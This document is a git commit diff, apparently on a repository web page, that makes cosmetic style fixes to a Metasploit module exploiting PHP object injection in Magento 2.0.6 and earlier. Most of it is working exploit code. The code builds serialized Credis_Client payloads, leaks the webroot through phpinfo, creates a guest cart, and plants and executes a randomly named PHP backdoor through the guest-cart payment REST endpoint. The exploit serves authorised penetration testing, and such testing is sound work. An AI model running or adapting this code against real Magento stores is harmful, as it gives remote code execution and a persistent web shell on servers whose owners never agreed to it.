Cosmetic changes for magento_unserialize to pass msftidy & guidelines
parent
4f42cc8c08
commit
7c9227f70b
|
@ -13,16 +13,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Magento <= 2.0.6 Unserialize Remote Code Execution',
|
||||
'Name' => 'Magento 2.0.6 Unserialize Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a PHP object injection vulnerability in Magento <= 2.0.6
|
||||
This module exploits a PHP object injection vulnerability in Magento 2.0.6
|
||||
or prior.
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Author' =>
|
||||
[
|
||||
'Netanel Rubin', # original discovery
|
||||
'agix', # original exploit
|
||||
'mr_me <mr_me@offensive-security.com>', # metasploit module
|
||||
'mr_me <mr_me[at]offensive-security.com>', # metasploit module
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -36,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
|
||||
],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Targeting', { 'auto' => true } ],
|
||||
],
|
||||
'DisclosureDate' => 'May 17 2016',
|
||||
|
@ -48,6 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def print_good(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def get_phpinfo
|
||||
# uses the Magento_Framework_DB_Transaction class
|
||||
serialize = 'O:13:\"Credis_Client\":22:{'
|
||||
|
@ -149,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
|
||||
serialize << 's:11:\"\u0000*\u0000requests\";'
|
||||
serialize << 'i:0;}'
|
||||
return serialize
|
||||
|
||||
serialize
|
||||
end
|
||||
|
||||
def get_phpshell
|
||||
|
@ -252,14 +260,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
|
||||
serialize << 's:11:\"\u0000*\u0000requests\";'
|
||||
serialize << 'i:0;}'
|
||||
return serialize
|
||||
|
||||
serialize
|
||||
end
|
||||
|
||||
def do_check
|
||||
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
|
||||
data << get_phpinfo
|
||||
data << "\"}},\"email\":\"#{@email}\"}"
|
||||
return send_request_cgi({
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
|
||||
'ctype' => 'application/json',
|
||||
|
@ -293,16 +303,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
rescue ::Rex::ConnectionError => e
|
||||
vprint_error(e.message)
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def get_webroot
|
||||
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
|
||||
data << get_phpinfo
|
||||
data << "\"}},\"email\":\"#{@email}\"}"
|
||||
|
||||
# we steal path via phpinfo
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
|
@ -310,11 +323,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'ctype' => 'application/json',
|
||||
'data' => data,
|
||||
})
|
||||
if res and res.code == 200
|
||||
|
||||
if res && res.code == 200
|
||||
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
|
||||
return true
|
||||
end
|
||||
return false
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def create_fake_cart
|
||||
|
@ -325,10 +340,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'cookie' => @cookies,
|
||||
'vars_get' => { 'form_key' => @form_key }
|
||||
})
|
||||
if (res and res.body.include?('[]'))
|
||||
return true
|
||||
end
|
||||
return false
|
||||
|
||||
return true if (res && res.body.include?('[]'))
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def generate_cart_id
|
||||
|
@ -337,27 +352,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
|
||||
'cookie' => @cookies,
|
||||
})
|
||||
if res and res.code == 200
|
||||
if res && res.code == 200
|
||||
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
|
||||
return true
|
||||
end
|
||||
return false
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def backdoor
|
||||
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
|
||||
data << get_phpshell
|
||||
data << "\"}},\"email\":\"#{@email}\"}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
|
||||
'ctype' => 'application/json',
|
||||
'data' => data,
|
||||
})
|
||||
if (res && res.body.include?('true'))
|
||||
return true
|
||||
end
|
||||
return false
|
||||
|
||||
return true if (res && res.body.include?('true'))
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def exec_code
|
||||
|
@ -366,21 +383,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
|
||||
}, timeout = 0.5)
|
||||
end
|
||||
|
||||
def exploit
|
||||
define_globals
|
||||
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
|
||||
register_files_for_cleanup("#{@backdoor}")
|
||||
if create_fake_cart && generate_cart_id
|
||||
print_good("generated a guest cart id")
|
||||
if get_webroot
|
||||
if backdoor
|
||||
if get_webroot && backdoor
|
||||
print_good("backdoor done!")
|
||||
exec_code
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
|
||||
[*] Processing scripts/sam.rc for ERB directives.
|
||||
|
|
Loading…
Reference in New Issue